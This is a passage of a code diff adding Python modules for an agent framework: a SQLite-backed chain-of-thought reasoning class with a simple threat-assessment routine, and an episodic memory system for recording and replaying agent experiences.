conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_chains ( + chain_id TEXT PRIMARY KEY, + agent_id 
TEXT NOT NULL, + problem_statement TEXT NOT NULL, + reasoning_goal TEXT NOT NULL, + final_conclusion TEXT, + overall_confidence REAL, + created_at TEXT NOT NULL, + completed_at TEXT, + metadata TEXT, + status TEXT DEFAULT 'active' + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_steps ( + step_id TEXT PRIMARY KEY, + chain_id TEXT NOT NULL, + step_number INTEGER NOT NULL, + reasoning_type TEXT NOT NULL, + premise TEXT NOT NULL, + inference_rule TEXT NOT NULL, + conclusion TEXT NOT NULL, + confidence REAL NOT NULL, + evidence TEXT, + assumptions TEXT, + created_at TEXT NOT NULL, + FOREIGN KEY (chain_id) REFERENCES reasoning_chains(chain_id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS inference_rules ( + rule_id TEXT PRIMARY KEY, + rule_name TEXT NOT NULL, + rule_type TEXT NOT NULL, + rule_pattern TEXT NOT NULL, + confidence_modifier REAL DEFAULT 1.0, + usage_count INTEGER DEFAULT 0, + success_rate REAL DEFAULT 0.5, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_evaluations ( + evaluation_id TEXT PRIMARY KEY, + chain_id TEXT NOT NULL, + evaluation_type TEXT, + correctness_score REAL, + logical_validity REAL, + completeness_score REAL, + evaluator TEXT, + feedback TEXT, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (chain_id) REFERENCES reasoning_chains(chain_id) + ) + """) + + # Create indices + conn.execute("CREATE INDEX IF NOT EXISTS idx_chains_agent ON reasoning_chains(agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_steps_chain ON reasoning_steps(chain_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_steps_type ON reasoning_steps(reasoning_type)") + + def start_reasoning_chain(self, agent_id: str, problem_statement: str, + reasoning_goal: str, initial_facts: List[str] = None) -> str: + """Start a new chain of reasoning""" + try: + chain_id = str(uuid.uuid4()) + + chain = ReasoningChain( + chain_id=chain_id, + agent_id=agent_id, + 
problem_statement=problem_statement, + reasoning_goal=reasoning_goal, + steps=[], + final_conclusion="", + overall_confidence=0.0, + created_at=datetime.now(), + completed_at=None, + metadata={ + 'initial_facts': initial_facts or [], + 'reasoning_depth': 0, + 'branch_count': 0 + } + ) + + # Store in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO reasoning_chains ( + chain_id, agent_id, problem_statement, reasoning_goal, + created_at, metadata + ) VALUES (?, ?, ?, ?, ?, ?) + """, ( + chain.chain_id, chain.agent_id, chain.problem_statement, + chain.reasoning_goal, chain.created_at.isoformat(), + json.dumps(chain.metadata) + )) + + logger.info(f"Started reasoning chain {chain_id} for problem: {problem_statement[:50]}...") + return chain_id + + except Exception as e: + logger.error(f"Error starting reasoning chain: {e}") + return "" + + def add_reasoning_step(self, chain_id: str, reasoning_type: ReasoningType, + premise: str, inference_rule: str = "", + evidence: List[str] = None, + assumptions: List[str] = None) -> str: + """Add a step to an existing reasoning chain""" + try: + step_id = str(uuid.uuid4()) + + # Get current step count for this chain + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT COUNT(*) FROM reasoning_steps WHERE chain_id = ? 
+ """, (chain_id,)) + step_number = cursor.fetchone()[0] + 1 + + # Apply reasoning to generate conclusion + conclusion, confidence = self._apply_reasoning( + reasoning_type, premise, inference_rule, evidence or [] + ) + + step = ReasoningStep( + step_id=step_id, + step_number=step_number, + reasoning_type=reasoning_type, + premise=premise, + inference_rule=inference_rule or self._select_inference_rule(reasoning_type), + conclusion=conclusion, + confidence=confidence, + evidence=evidence or [], + assumptions=assumptions or [], + created_at=datetime.now() + ) + + # Store step in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO reasoning_steps ( + step_id, chain_id, step_number, reasoning_type, + premise, inference_rule, conclusion, confidence, + evidence, assumptions, created_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + step.step_id, chain_id, step.step_number, + step.reasoning_type.value, step.premise, + step.inference_rule, step.conclusion, + step.confidence, json.dumps(step.evidence), + json.dumps(step.assumptions), + step.created_at.isoformat() + )) + + logger.info(f"Added reasoning step {step_number} to chain {chain_id}") + return step_id + + except Exception as e: + logger.error(f"Error adding reasoning step: {e}") + return "" + + def complete_reasoning_chain(self, chain_id: str) -> Dict[str, Any]: + """Complete reasoning chain and generate final conclusion""" + try: + # Get all steps for this chain + steps = self._get_chain_steps(chain_id) + + if not steps: + return {'error': 'No reasoning steps found'} + + # Generate final conclusion by combining all steps + final_conclusion, overall_confidence = self._synthesize_conclusion(steps) + + # Update chain in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE reasoning_chains SET + final_conclusion = ?, + overall_confidence = ?, + completed_at = ?, + status = 'completed' + WHERE chain_id = ? 
+ """, ( + final_conclusion, overall_confidence, + datetime.now().isoformat(), chain_id + )) + + result = { + 'chain_id': chain_id, + 'final_conclusion': final_conclusion, + 'overall_confidence': overall_confidence, + 'step_count': len(steps), + 'reasoning_quality': self._assess_reasoning_quality(steps) + } + + logger.info(f"Completed reasoning chain {chain_id}: {final_conclusion[:50]}...") + return result + + except Exception as e: + logger.error(f"Error completing reasoning chain: {e}") + return {'error': str(e)} + + def reason_about_threat(self, threat_indicators: List[str], + agent_id: str = "") -> Dict[str, Any]: + """Perform comprehensive threat reasoning using multiple reasoning types""" + try: + problem = f"Analyze threat indicators: {', '.join(threat_indicators[:3])}..." + + # Start reasoning chain + chain_id = self.start_reasoning_chain( + agent_id, problem, "threat_assessment", threat_indicators + ) + + reasoning_results = { + 'chain_id': chain_id, + 'threat_indicators': threat_indicators, + 'reasoning_steps': [], + 'threat_assessment': {}, + 'recommendations': [] + } + + # Step 1: Deductive reasoning - What do we know for certain? 
+ known_facts = f"Observed indicators: {', '.join(threat_indicators)}" + step1_id = self.add_reasoning_step( + chain_id, ReasoningType.DEDUCTIVE, known_facts, + "indicator_classification", + evidence=threat_indicators + ) + + # Step 2: Inductive reasoning - Pattern recognition + pattern_premise = "Multiple indicators suggest coordinated activity" + step2_id = self.add_reasoning_step( + chain_id, ReasoningType.INDUCTIVE, pattern_premise, + "pattern_generalization", + evidence=[f"Indicator pattern analysis: {len(threat_indicators)} indicators"] + ) + + # Step 3: Abductive reasoning - Best explanation + explanation_premise = "Finding most likely explanation for observed indicators" + step3_id = self.add_reasoning_step( + chain_id, ReasoningType.ABDUCTIVE, explanation_premise, + "hypothesis_selection", + assumptions=["Indicators represent malicious activity"] + ) + + # Step 4: Causal reasoning - Impact analysis + impact_premise = "If threat is real, what are potential consequences?" + step4_id = self.add_reasoning_step( + chain_id, ReasoningType.CAUSAL, impact_premise, + "impact_analysis", + assumptions=["Current security controls", "System vulnerabilities"] + ) + + # Complete the reasoning chain + completion_result = self.complete_reasoning_chain(chain_id) + reasoning_results.update(completion_result) + + # Generate threat assessment based on reasoning + steps = self._get_chain_steps(chain_id) + avg_confidence = sum(step['confidence'] for step in steps) / len(steps) if steps else 0 + + if avg_confidence > 0.8: + threat_level = "HIGH" + priority = "immediate" + elif avg_confidence > 0.6: + threat_level = "MEDIUM" + priority = "elevated" + else: + threat_level = "LOW" + priority = "monitor" + + reasoning_results['threat_assessment'] = { + 'threat_level': threat_level, + 'priority': priority, + 'confidence': avg_confidence, + 'reasoning_quality': completion_result.get('reasoning_quality', 0.5) + } + + # Generate recommendations + recommendations = [ + { + 'action': 
'investigate_indicators', + 'priority': 'high' if avg_confidence > 0.7 else 'medium', + 'rationale': 'Based on deductive analysis of indicators' + }, + { + 'action': 'monitor_systems', + 'priority': 'medium', + 'rationale': 'Based on causal impact analysis' + } + ] + + if threat_level == "HIGH": + recommendations.insert(0, { + 'action': 'activate_incident_response', + 'priority': 'critical', + 'rationale': 'High confidence threat detected through multi-step reasoning' + }) + + reasoning_results['recommendations'] = recommendations + + logger.info(f"Threat reasoning complete: {threat_level} threat (confidence: {avg_confidence:.3f})") + return reasoning_results + + except Exception as e: + logger.error(f"Error in threat reasoning: {e}") + return {'error': str(e)} + + def _apply_reasoning(self, reasoning_type: ReasoningType, premise: str, + inference_rule: str, evidence: List[str]) -> Tuple[str, float]: + """Apply specific reasoning type to generate conclusion""" + try: + base_confidence = 0.5 + + if reasoning_type == ReasoningType.DEDUCTIVE: + # Deductive: If premise is true and rule is valid, conclusion follows + conclusion = f"Therefore: {self._apply_deductive_rule(premise, inference_rule)}" + confidence = min(0.9, base_confidence + (len(evidence) * 0.1)) + + elif reasoning_type == ReasoningType.INDUCTIVE: + # Inductive: Generalize from specific observations + conclusion = f"Pattern suggests: {self._apply_inductive_rule(premise, evidence)}" + confidence = min(0.8, base_confidence + (len(evidence) * 0.05)) + + elif reasoning_type == ReasoningType.ABDUCTIVE: + # Abductive: Best explanation for observations + conclusion = f"Most likely explanation: {self._apply_abductive_rule(premise, evidence)}" + confidence = min(0.7, base_confidence + (len(evidence) * 0.08)) + + elif reasoning_type == ReasoningType.CAUSAL: + # Causal: Cause and effect relationships + conclusion = f"Causal inference: {self._apply_causal_rule(premise, evidence)}" + confidence = min(0.75, 
base_confidence + 0.2) + + elif reasoning_type == ReasoningType.STRATEGIC: + # Strategic: Goal-oriented reasoning + conclusion = f"Strategic conclusion: {self._apply_strategic_rule(premise)}" + confidence = min(0.8, base_confidence + 0.25) + + else: + # Default reasoning + conclusion = f"Conclusion based on {reasoning_type.value}: {premise}" + confidence = base_confidence + + return conclusion, confidence + + except Exception as e: + logger.error(f"Error applying reasoning: {e}") + return f"Unable to reason about: {premise}", 0.1 + + def _apply_deductive_rule(self, premise: str, rule: str) -> str: + """Apply deductive reasoning rule""" + if "indicators" in premise.lower(): + return "specific threat types can be identified from these indicators" + elif "malicious" in premise.lower(): + return "security response is warranted" + else: + return f"logical consequence follows from {premise[:30]}..." + + def _apply_inductive_rule(self, premise: str, evidence: List[str]) -> str: + """Apply inductive reasoning rule""" + if len(evidence) > 3: + return "systematic attack pattern likely in progress" + elif len(evidence) > 1: + return "coordinated threat activity possible" + else: + return "isolated incident or false positive" + + def _apply_abductive_rule(self, premise: str, evidence: List[str]) -> str: + """Apply abductive reasoning rule""" + if any("network" in str(e).lower() for e in evidence): + return "network-based attack scenario" + elif any("file" in str(e).lower() for e in evidence): + return "malware or file-based attack" + else: + return "unknown attack vector requiring investigation" + + def _apply_causal_rule(self, premise: str, evidence: List[str]) -> str: + """Apply causal reasoning rule""" + return "if threat is confirmed, system compromise and data exfiltration may occur" + + def _apply_strategic_rule(self, premise: str) -> str: + """Apply strategic reasoning rule""" + return "optimal response is to investigate thoroughly while maintaining operational 
security" + + def _select_inference_rule(self, reasoning_type: ReasoningType) -> str: + """Select appropriate inference rule for reasoning type""" + rule_map = { + ReasoningType.DEDUCTIVE: "modus_ponens", + ReasoningType.INDUCTIVE: "generalization", + ReasoningType.ABDUCTIVE: "inference_to_best_explanation", + ReasoningType.CAUSAL: "causal_inference", + ReasoningType.STRATEGIC: "means_ends_analysis" + } + return rule_map.get(reasoning_type, "default_inference") + + def _get_chain_steps(self, chain_id: str) -> List[Dict[str, Any]]: + """Get all steps for a reasoning chain""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT * FROM reasoning_steps + WHERE chain_id = ? + ORDER BY step_number + """, (chain_id,)) + + steps = [] + for row in cursor.fetchall(): + step = { + 'step_id': row[0], + 'step_number': row[2], + 'reasoning_type': row[3], + 'premise': row[4], + 'inference_rule': row[5], + 'conclusion': row[6], + 'confidence': row[7], + 'evidence': json.loads(row[8]) if row[8] else [], + 'assumptions': json.loads(row[9]) if row[9] else [] + } + steps.append(step) + + return steps + + except Exception as e: + logger.error(f"Error getting chain steps: {e}") + return [] + + def _synthesize_conclusion(self, steps: List[Dict[str, Any]]) -> Tuple[str, float]: + """Synthesize final conclusion from reasoning steps""" + if not steps: + return "No conclusion reached", 0.0 + + # Weight later steps more heavily + weighted_confidence = 0.0 + total_weight = 0.0 + + conclusions = [] + + for i, step in enumerate(steps): + weight = (i + 1) / len(steps) # Later steps have higher weight + weighted_confidence += step['confidence'] * weight + total_weight += weight + conclusions.append(step['conclusion']) + + final_confidence = weighted_confidence / total_weight if total_weight > 0 else 0.0 + + # Create synthesized conclusion + if len(conclusions) == 1: + final_conclusion = conclusions[0] + else: + final_conclusion = f"Multi-step analysis 
concludes: {conclusions[-1]}" + + return final_conclusion, final_confidence + + def _assess_reasoning_quality(self, steps: List[Dict[str, Any]]) -> float: + """Assess the quality of the reasoning chain""" + if not steps: + return 0.0 + + quality_score = 0.0 + + # Diversity of reasoning types (better) + reasoning_types = set(step['reasoning_type'] for step in steps) + diversity_score = min(len(reasoning_types) / 4.0, 1.0) # Max 4 types + + # Logical progression (each step builds on previous) + progression_score = 1.0 # Assume good progression + + # Evidence quality (more evidence is better) + avg_evidence = sum(len(step['evidence']) for step in steps) / len(steps) + evidence_score = min(avg_evidence / 3.0, 1.0) + + # Confidence consistency (not too variable) + confidences = [step['confidence'] for step in steps] + confidence_std = (max(confidences) - min(confidences)) if len(confidences) > 1 else 0 + consistency_score = max(0.0, 1.0 - confidence_std) + + quality_score = ( + diversity_score * 0.3 + + progression_score * 0.3 + + evidence_score * 0.2 + + consistency_score * 0.2 + ) + + return quality_score + + def _load_inference_rules(self) -> Dict[str, Any]: + """Load available inference rules""" + return { + 'modus_ponens': {'pattern': 'If P then Q; P; therefore Q', 'confidence': 0.9}, + 'generalization': {'pattern': 'Multiple instances of X; therefore X is common', 'confidence': 0.7}, + 'causal_inference': {'pattern': 'A precedes B; A and B correlated; A causes B', 'confidence': 0.6}, + 'best_explanation': {'pattern': 'X explains Y better than alternatives', 'confidence': 0.8} + } + + def _load_reasoning_patterns(self) -> Dict[str, Any]: + """Load common reasoning patterns""" + return { + 'threat_analysis': [ + ReasoningType.DEDUCTIVE, + ReasoningType.INDUCTIVE, + ReasoningType.ABDUCTIVE, + ReasoningType.CAUSAL + ], + 'vulnerability_assessment': [ + ReasoningType.DEDUCTIVE, + ReasoningType.STRATEGIC, + ReasoningType.CAUSAL + ] + } + + def 
get_reasoning_statistics(self) -> Dict[str, Any]: + """Get comprehensive reasoning system statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic counts + cursor = conn.execute("SELECT COUNT(*) FROM reasoning_chains") + stats['total_chains'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT COUNT(*) FROM reasoning_steps") + stats['total_steps'] = cursor.fetchone()[0] + + # Reasoning type distribution + cursor = conn.execute(""" + SELECT reasoning_type, COUNT(*) + FROM reasoning_steps + GROUP BY reasoning_type + """) + stats['reasoning_types'] = dict(cursor.fetchall()) + + # Average confidence by reasoning type + cursor = conn.execute(""" + SELECT reasoning_type, AVG(confidence) + FROM reasoning_steps + GROUP BY reasoning_type + """) + stats['avg_confidence_by_type'] = dict(cursor.fetchall()) + + # Chain completion rate + cursor = conn.execute("SELECT COUNT(*) FROM reasoning_chains WHERE status = 'completed'") + completed = cursor.fetchone()[0] + stats['completion_rate'] = completed / stats['total_chains'] if stats['total_chains'] > 0 else 0 + + return stats + + except Exception as e: + logger.error(f"Error getting reasoning statistics: {e}") + return {'error': str(e)} + +# Export the main classes +__all__ = ['ChainOfThoughtReasoning', 'ReasoningChain', 'ReasoningStep', 'ReasoningType'] diff --git a/src/cognitive/episodic_memory.py b/src/cognitive/episodic_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..e666d36f3e89cef75dfe142d5572a6da1a26207d --- /dev/null +++ b/src/cognitive/episodic_memory.py @@ -0,0 +1,653 @@ +""" +Episodic Memory System for Experience Replay and Learning +Captures temporal sequences of agent experiences for learning +""" +import sqlite3 +import json +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import pickle + +logger = 
logging.getLogger(__name__) + +@dataclass +class Episode: + """Individual episode with temporal sequence""" + id: str + agent_id: str + session_id: str + start_time: datetime + end_time: Optional[datetime] + episode_type: str # operation, training, evaluation, etc. + context: Dict[str, Any] + actions: List[Dict[str, Any]] + observations: List[Dict[str, Any]] + rewards: List[float] + outcome: Optional[str] + success: bool + metadata: Dict[str, Any] + +@dataclass +class ExperienceReplay: + """Experience replay record for learning""" + episode_id: str + replay_count: int + last_replayed: datetime + replay_effectiveness: float + learning_insights: List[str] + +class EpisodicMemorySystem: + """Advanced episodic memory with experience replay capabilities""" + + def __init__(self, db_path: str = "data/cognitive/episodic_memory.db"): + """Initialize episodic memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self._active_episodes = {} + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS episodes ( + id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + session_id TEXT NOT NULL, + start_time TEXT NOT NULL, + end_time TEXT, + episode_type TEXT NOT NULL, + context TEXT, + actions TEXT, + observations TEXT, + rewards TEXT, + outcome TEXT, + success BOOLEAN, + metadata TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS experience_replay ( + id TEXT PRIMARY KEY, + episode_id TEXT, + replay_count INTEGER DEFAULT 0, + last_replayed TEXT, + replay_effectiveness REAL DEFAULT 0.0, + learning_insights TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (episode_id) REFERENCES episodes(id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS episode_patterns ( + id TEXT PRIMARY KEY, + pattern_type TEXT, + pattern_description 
TEXT, + episodes TEXT, + frequency INTEGER, + success_rate REAL, + discovered_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Create indices + conn.execute("CREATE INDEX IF NOT EXISTS idx_agent_episodes ON episodes(agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_episode_type ON episodes(episode_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_episode_success ON episodes(success)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_episode_start_time ON episodes(start_time)") + + def start_episode(self, agent_id: str, session_id: str, + episode_type: str, context: Dict[str, Any] = None) -> str: + """Start a new episode recording""" + try: + episode_id = str(uuid.uuid4()) + + episode = Episode( + id=episode_id, + agent_id=agent_id, + session_id=session_id, + start_time=datetime.now(), + end_time=None, + episode_type=episode_type, + context=context or {}, + actions=[], + observations=[], + rewards=[], + outcome=None, + success=False, + metadata={} + ) + + self._active_episodes[episode_id] = episode + + # Store initial episode data + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO episodes ( + id, agent_id, session_id, start_time, episode_type, + context, actions, observations, rewards, success, metadata + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) 
+ """, ( + episode.id, episode.agent_id, episode.session_id, + episode.start_time.isoformat(), episode.episode_type, + json.dumps(episode.context), json.dumps(episode.actions), + json.dumps(episode.observations), json.dumps(episode.rewards), + episode.success, json.dumps(episode.metadata) + )) + + logger.info(f"Started episode {episode_id} for agent {agent_id}") + return episode_id + + except Exception as e: + logger.error(f"Error starting episode: {e}") + return "" + + def record_action(self, episode_id: str, action: Dict[str, Any]): + """Record an action in the current episode""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + action['timestamp'] = datetime.now().isoformat() + episode.actions.append(action) + + logger.debug(f"Recorded action in episode {episode_id}: {action.get('type', 'unknown')}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error recording action: {e}") + + def record_observation(self, episode_id: str, observation: Dict[str, Any]): + """Record an observation in the current episode""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + observation['timestamp'] = datetime.now().isoformat() + episode.observations.append(observation) + + logger.debug(f"Recorded observation in episode {episode_id}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error recording observation: {e}") + + def record_reward(self, episode_id: str, reward: float): + """Record a reward signal in the current episode""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + episode.rewards.append(reward) + + logger.debug(f"Recorded reward in episode {episode_id}: {reward}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error recording reward: {e}") + + def 
end_episode(self, episode_id: str, success: bool = False, + outcome: str = "", metadata: Dict[str, Any] = None): + """End an episode and store final results""" + try: + if episode_id in self._active_episodes: + episode = self._active_episodes[episode_id] + episode.end_time = datetime.now() + episode.success = success + episode.outcome = outcome + if metadata: + episode.metadata.update(metadata) + + # Update database with final episode data + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE episodes SET + end_time = ?, actions = ?, observations = ?, + rewards = ?, outcome = ?, success = ?, metadata = ? + WHERE id = ? + """, ( + episode.end_time.isoformat(), + json.dumps(episode.actions), + json.dumps(episode.observations), + json.dumps(episode.rewards), + episode.outcome, + episode.success, + json.dumps(episode.metadata), + episode_id + )) + + # Create experience replay record + self._create_replay_record(episode_id) + + # Remove from active episodes + del self._active_episodes[episode_id] + + logger.info(f"Ended episode {episode_id}: success={success}, outcome={outcome}") + else: + logger.warning(f"Episode {episode_id} not active") + + except Exception as e: + logger.error(f"Error ending episode: {e}") + + def get_episodes_for_replay(self, agent_id: str = "", episode_type: str = "", + success_only: bool = False, limit: int = 10) -> List[Episode]: + """Get episodes suitable for experience replay""" + try: + with sqlite3.connect(self.db_path) as conn: + conditions = [] + params = [] + + if agent_id: + conditions.append("agent_id = ?") + params.append(agent_id) + + if episode_type: + conditions.append("episode_type = ?") + params.append(episode_type) + + if success_only: + conditions.append("success = 1") + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = conn.execute(f""" + SELECT * FROM episodes + WHERE {where_clause} AND end_time IS NOT NULL + ORDER BY start_time DESC + LIMIT ? 
+ """, params + [limit]) + + episodes = [] + for row in cursor.fetchall(): + episode = Episode( + id=row[0], + agent_id=row[1], + session_id=row[2], + start_time=datetime.fromisoformat(row[3]), + end_time=datetime.fromisoformat(row[4]) if row[4] else None, + episode_type=row[5], + context=json.loads(row[6]) if row[6] else {}, + actions=json.loads(row[7]) if row[7] else [], + observations=json.loads(row[8]) if row[8] else [], + rewards=json.loads(row[9]) if row[9] else [], + outcome=row[10], + success=bool(row[11]), + metadata=json.loads(row[12]) if row[12] else {} + ) + episodes.append(episode) + + logger.info(f"Retrieved {len(episodes)} episodes for replay") + return episodes + + except Exception as e: + logger.error(f"Error getting episodes for replay: {e}") + return [] + + def replay_experience(self, episode_id: str) -> Dict[str, Any]: + """Replay an episode and extract learning insights""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute("SELECT * FROM episodes WHERE id = ?", (episode_id,)) + row = cursor.fetchone() + + if not row: + return {'error': 'Episode not found'} + + episode = Episode( + id=row[0], + agent_id=row[1], + session_id=row[2], + start_time=datetime.fromisoformat(row[3]), + end_time=datetime.fromisoformat(row[4]) if row[4] else None, + episode_type=row[5], + context=json.loads(row[6]) if row[6] else {}, + actions=json.loads(row[7]) if row[7] else [], + observations=json.loads(row[8]) if row[8] else [], + rewards=json.loads(row[9]) if row[9] else [], + outcome=row[10], + success=bool(row[11]), + metadata=json.loads(row[12]) if row[12] else {} + ) + + # Analyze episode for learning insights + insights = self._analyze_episode_for_insights(episode) + + # Update replay statistics + self._update_replay_stats(episode_id, insights) + + logger.info(f"Replayed episode {episode_id} with {len(insights)} insights") + return { + 'episode': episode, + 'insights': insights, + 'replay_time': datetime.now().isoformat() + } + + except 
Exception as e: + logger.error(f"Error replaying experience: {e}") + return {'error': str(e)} + + def discover_patterns(self) -> Dict[str, Any]: + """Discover patterns across episodes""" + try: + with sqlite3.connect(self.db_path) as conn: + # Get all completed episodes + cursor = conn.execute(""" + SELECT * FROM episodes + WHERE end_time IS NOT NULL + ORDER BY start_time + """) + + episodes = cursor.fetchall() + patterns = { + 'action_patterns': self._discover_action_patterns(episodes), + 'success_patterns': self._discover_success_patterns(episodes), + 'temporal_patterns': self._discover_temporal_patterns(episodes), + 'agent_patterns': self._discover_agent_patterns(episodes) + } + + # Store discovered patterns + for pattern_type, pattern_list in patterns.items(): + for pattern in pattern_list: + self._store_pattern(pattern_type, pattern) + + logger.info(f"Discovered patterns: {sum(len(p) for p in patterns.values())} total") + return patterns + + except Exception as e: + logger.error(f"Error discovering patterns: {e}") + return {'error': str(e)} + + def _create_replay_record(self, episode_id: str): + """Create experience replay record""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO experience_replay (id, episode_id, last_replayed) + VALUES (?, ?, ?) 
+ """, (str(uuid.uuid4()), episode_id, datetime.now().isoformat())) + + except Exception as e: + logger.error(f"Error creating replay record: {e}") + + def _analyze_episode_for_insights(self, episode: Episode) -> List[str]: + """Analyze episode and extract learning insights""" + insights = [] + + try: + # Action sequence analysis + if len(episode.actions) > 1: + action_types = [a.get('type', 'unknown') for a in episode.actions] + unique_actions = len(set(action_types)) + insights.append(f"Used {unique_actions} different action types in sequence") + + # Reward trajectory analysis + if episode.rewards: + total_reward = sum(episode.rewards) + avg_reward = total_reward / len(episode.rewards) + insights.append(f"Average reward per step: {avg_reward:.3f}") + + # Reward trend + if len(episode.rewards) > 2: + if episode.rewards[-1] > episode.rewards[0]: + insights.append("Improving performance throughout episode") + else: + insights.append("Declining performance throughout episode") + + # Success factor analysis + if episode.success: + insights.append(f"Success achieved with {len(episode.actions)} actions") + if episode.outcome: + insights.append(f"Success outcome: {episode.outcome}") + else: + insights.append(f"Failed after {len(episode.actions)} actions") + if episode.outcome: + insights.append(f"Failure reason: {episode.outcome}") + + # Context relevance + if episode.context: + context_keys = list(episode.context.keys()) + insights.append(f"Context factors: {', '.join(context_keys[:3])}") + + except Exception as e: + logger.error(f"Error analyzing episode insights: {e}") + insights.append(f"Analysis error: {str(e)}") + + return insights + + def _update_replay_stats(self, episode_id: str, insights: List[str]): + """Update replay statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + # Calculate effectiveness based on insights + effectiveness = min(len(insights) / 10.0, 1.0) # Scale to 0-1 + + conn.execute(""" + UPDATE experience_replay SET + replay_count = 
replay_count + 1, + last_replayed = ?, + replay_effectiveness = ?, + learning_insights = ? + WHERE episode_id = ? + """, ( + datetime.now().isoformat(), + effectiveness, + json.dumps(insights), + episode_id + )) + + except Exception as e: + logger.error(f"Error updating replay stats: {e}") + + def _discover_action_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover common action patterns""" + patterns = [] + action_sequences = {} + + for episode in episodes: + if episode[7]: # actions column + actions = json.loads(episode[7]) + action_types = [a.get('type', 'unknown') for a in actions] + + # Look for sequences of length 2-4 + for seq_len in range(2, min(5, len(action_types) + 1)): + for i in range(len(action_types) - seq_len + 1): + sequence = tuple(action_types[i:i + seq_len]) + if sequence not in action_sequences: + action_sequences[sequence] = {'count': 0, 'success_count': 0} + action_sequences[sequence]['count'] += 1 + if episode[11]: # success column + action_sequences[sequence]['success_count'] += 1 + + # Convert to patterns + for sequence, stats in action_sequences.items(): + if stats['count'] >= 3: # Minimum frequency + success_rate = stats['success_count'] / stats['count'] + patterns.append({ + 'pattern': ' -> '.join(sequence), + 'frequency': stats['count'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['frequency'], reverse=True) + + def _discover_success_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover patterns that lead to success""" + patterns = [] + success_factors = {} + + for episode in episodes: + # Analyze context factors for all episodes + if episode[6]: # context column + context = json.loads(episode[6]) + for key, value in context.items(): + factor_key = f"{key}={value}" + if factor_key not in success_factors: + success_factors[factor_key] = {'success': 0, 'total': 0} + success_factors[factor_key]['total'] += 1 + if episode[11]: # success column + 
success_factors[factor_key]['success'] += 1 + + # Convert to patterns + for factor, stats in success_factors.items(): + if stats['total'] >= 3: # Minimum frequency + success_rate = stats['success'] / stats['total'] if stats['total'] > 0 else 0 + if success_rate > 0.7: # High success rate threshold + patterns.append({ + 'pattern': f"Context factor: {factor}", + 'frequency': stats['total'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['success_rate'], reverse=True) + + def _discover_temporal_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover temporal patterns in episodes""" + patterns = [] + + # Group episodes by hour of day + hour_stats = {} + for episode in episodes: + start_time = datetime.fromisoformat(episode[3]) + hour = start_time.hour + + if hour not in hour_stats: + hour_stats[hour] = {'total': 0, 'success': 0} + + hour_stats[hour]['total'] += 1 + if episode[11]: # success column + hour_stats[hour]['success'] += 1 + + # Find patterns + for hour, stats in hour_stats.items(): + if stats['total'] >= 2: # Minimum episodes + success_rate = stats['success'] / stats['total'] + patterns.append({ + 'pattern': f"Episodes at hour {hour}", + 'frequency': stats['total'], + 'success_rate': success_rate + }) + + return sorted(patterns, key=lambda x: x['frequency'], reverse=True) + + def _discover_agent_patterns(self, episodes: List[Tuple]) -> List[Dict[str, Any]]: + """Discover agent-specific patterns""" + patterns = [] + agent_stats = {} + + for episode in episodes: + agent_id = episode[1] # agent_id column + episode_type = episode[5] # episode_type column + + key = f"{agent_id}:{episode_type}" + if key not in agent_stats: + agent_stats[key] = {'total': 0, 'success': 0} + + agent_stats[key]['total'] += 1 + if episode[11]: # success column + agent_stats[key]['success'] += 1 + + # Convert to patterns + for key, stats in agent_stats.items(): + if stats['total'] >= 